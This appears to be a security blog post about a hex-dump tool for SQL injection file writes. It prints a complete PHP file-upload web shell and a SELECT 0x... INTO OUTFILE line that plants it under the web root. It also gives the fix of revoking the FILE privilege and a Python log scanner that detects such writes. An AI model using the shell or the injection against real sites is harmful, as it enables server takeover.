Linux PHP and Website Security ProjectX

Script Hex Dump – Forensic Tool

SHD

This Java-based application parses the contents of a script (for example a PHP script) and automatically converts it into a hex value. Some pentesters use this method to test for a possible SQL injection vulnerability in a website. As we all know, SQL injection attacks have been in the wild for many years now, especially against websites running PHP with MySQL as the backend database server; one of their capabilities, if the server is not properly configured, is writing arbitrary files to disk.

For example, using this tool, if I have this PHP upload shell:

<html>
<p>impeldown@irc.dal.net</p>
<p>Greetz to: www.theprojectxblog.net</p>
<form enctype="multipart/form-data" action="uploader.php" method="POST">
<input type="hidden" name="MAX_FILE_SIZE" value="1000000" />
Choose a file to upload: <input name="uploadedfile" type="file" /><br />
<input type="submit" value="Upload File" />
</form>
</html>

<?php
// Only touch $_FILES once we know the field was actually submitted.
if (isset($_FILES['uploadedfile']['name'])) {
    $target_path = "";
    $target_path = $target_path . basename($_FILES['uploadedfile']['name']);
    if (move_uploaded_file($_FILES['uploadedfile']['tmp_name'], $target_path)) {
        echo "The file " . basename($_FILES['uploadedfile']['name']) . " has been uploaded";
    } else {
        echo "There was an error uploading the file, please try again!";
    }
}
?>

Select your script, copy the generated hex value, and paste it into the SQL code you are sending to the vulnerable website:

e.g. SELECT 0x3C68746D6C3E203C703E696D70656C646F776E4069… INTO OUTFILE '/var/www/htdocs/u2.php'

If the SQL injection works, the scanner finding will look something like this:

PHP Backdoor

Severity: Medium

Description:

The FILE privilege allows a user to create files on the operating system using the SELECT [value] INTO OUTFILE statement. The files are written by the MySQL server process, so they are owned by the account the database runs as. This privilege can be abused to take control of the MySQL database and possibly the system.

Solution:

To prevent users from reading from or writing to the file system, you should revoke the FILE privilege.

shell> mysql -u root [password]

mysql> REVOKE FILE ON *.* FROM [username];

mysql> FLUSH PRIVILEGES;
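Revoking FILE is the fix; the complementary check is spotting this pattern in the MySQL general query log. The script below is an added example (not the SHD tool or any code from the post): it scans general-log lines for INTO OUTFILE / INTO DUMPFILE, decodes any 0x hex literal back to text the way SHD encodes it, and rates the finding. The log lines and hex values are constructed for the example.

```python
import re

# Constructed sample in MySQL general-log style: <timestamp> <thread id> Query <statement>.
SAMPLE_LOG = """\
2024-01-01T10:00:01.000000Z 12 Query SELECT id, name FROM products WHERE id = 7
2024-01-01T10:00:02.000000Z 12 Query SELECT 0x3C3F706870206563686F20313B203F3E INTO OUTFILE '/var/www/htdocs/u2.php'
2024-01-01T10:00:03.000000Z 13 Query SELECT name FROM products INTO OUTFILE '/tmp/report.csv'
2024-01-01T10:00:04.000000Z 14 Query SELECT 0x48656C6C6F INTO DUMPFILE '/tmp/hello.bin'
"""

QUERY_RE = re.compile(r"\bQuery\s+(.*)$")
OUTFILE_RE = re.compile(r"\bINTO\s+(OUTFILE|DUMPFILE)\s+'([^']*)'", re.IGNORECASE)
HEXLIT_RE = re.compile(r"\b0x([0-9A-Fa-f]+)\b")

def decode_hex_literals(statement):
    """Return the decoded text of every 0x... literal in the statement."""
    decoded = []
    for digits in HEXLIT_RE.findall(statement):
        if len(digits) % 2:          # odd length cannot be a byte string
            continue
        decoded.append(bytes.fromhex(digits).decode("latin-1"))
    return decoded

def analyse_statement(statement):
    """Flag file-writing SELECTs; a PHP payload or a .php target rates high."""
    match = OUTFILE_RE.search(statement)
    if not match:
        return None
    kind, target = match.group(1).upper(), match.group(2)
    payloads = decode_hex_literals(statement)
    looks_like_php = any("<?php" in p.lower() for p in payloads) or target.lower().endswith(".php")
    return {"kind": kind, "target": target, "decoded": payloads,
            "severity": "high" if looks_like_php else "medium"}

def scan_log(text):
    """Run analyse_statement over each general-log line and collect the findings."""
    findings = []
    for line in text.splitlines():
        m = QUERY_RE.search(line)
        if m:
            finding = analyse_statement(m.group(1))
            if finding:
                findings.append(finding)
    return findings

if __name__ == "__main__":
    for f in scan_log(SAMPLE_LOG):
        print(f["severity"].upper(), f["kind"], "->", f["target"], f["decoded"])
```

Legitimate exports (the report.csv line) still show up at medium, so the rule is a triage aid, not a block list; once FILE has been revoked, any hit at all is worth a look.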


Download the tool here
